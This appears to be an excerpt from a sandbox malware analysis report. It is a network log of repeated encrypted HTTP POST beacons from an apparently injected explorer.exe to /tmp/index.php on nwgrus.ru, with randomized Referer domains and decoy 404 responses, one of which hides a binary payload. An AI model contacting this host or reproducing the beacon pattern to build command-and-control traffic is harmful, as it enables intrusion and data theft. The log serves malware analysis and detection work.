                                                                                                                          Accept: */*
                                                                                                                          Referer: http://hjaonoqsbnhieap.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 286
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:49.709860086 CEST286OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 5a 3c a8 e7
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vuZ<^B\bbQKBq2pBH]JN>pcXO[yk'>KzVTP$!^)b1yF"~c{A8.
                                                                                                                          Oct 8, 2024 18:23:50.575336933 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:50 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          21192.168.2.661388160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:50.584526062 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://kfntyderqkkh.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 258
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:50.584561110 CEST258OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 2f 34 b5 f8
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu/4pOGokLS"D55{l#ZC<W8*XV~?\:2$L>}%h)+x22>*'8r}wYBYNNmrk&K
                                                                                                                          Oct 8, 2024 18:23:51.440485954 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:51 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          22192.168.2.661397160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:51.448854923 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://bpuffphxcjr.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 219
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:51.448882103 CEST219OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 38 2a f3 ec
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu8*cSf[i]}K~``b.zd/O"y CQdN%+p#VG}.w4ox(RG03!`
                                                                                                                          Oct 8, 2024 18:23:52.527090073 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:52 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          23192.168.2.661404160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:52.536545038 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://evwfmjkyovghciew.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 264
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:52.536571026 CEST264OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 3d 5b ed ea
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu=[m FE|^D+8=Hl(S+@3zNy|@qoY:?F7IGC:=tH#u^;.h\1_Gd
                                                                                                                          Oct 8, 2024 18:23:53.404282093 CEST189INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:53 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb
                                                                                                                          Data Ascii: #\6Y9l_m=rA


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          24192.168.2.661419160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:54.646945953 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://dxitdoiirfghic.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 220
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:54.646970987 CEST220OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2c 5b 1c 6b 2c 90 f4 76 0b 75 64 0d e7 90
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA ,[k,vudu0BSQuOCILO7W/^[=1QN<CEQZ0EG[|-ypyv~_BDb
                                                                                                                          Oct 8, 2024 18:23:55.551220894 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:55 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          25192.168.2.661424160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:55.566946983 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://goilbsuxbgu.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 341
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:55.566965103 CEST341OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 3f 2b aa fd
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu?+G'|yl_KS10]z~ A"On1P7*"kC|sKEy5Y7`K~y_p}~M0b
                                                                                                                          Oct 8, 2024 18:23:56.454329967 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:56 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          26192.168.2.661425160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:56.480500937 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://bmhunjcauidhfjas.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 232
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:56.480523109 CEST232OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 72 2e bf 9a
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vur.xSHc XgW.+tE_fB^:D>#Es7}_*^7Ua=&*Qt3m{)_N6
                                                                                                                          Oct 8, 2024 18:23:57.350981951 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:57 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          27192.168.2.661426160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:57.424079895 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://ehqwwnwmwdh.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 208
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:57.424102068 CEST208OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 38 3b d5 aa
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu8;,q@QxbjY1R5=Q9?v=t/C#*9"BJD/[baM_-VC2*mvt179j
                                                                                                                          Oct 8, 2024 18:23:58.385658979 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:58 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          28192.168.2.661427160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:59.025120974 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://oawojikvjxqxudp.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 244
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:59.025186062 CEST244OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 20 0f b7 a3
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu m2.[T_cxN\Wz#8;&WO%iw_='tMr$|MTvV'~G8M&GMTT"gwgUF
                                                                                                                          Oct 8, 2024 18:23:59.889595985 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:59 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
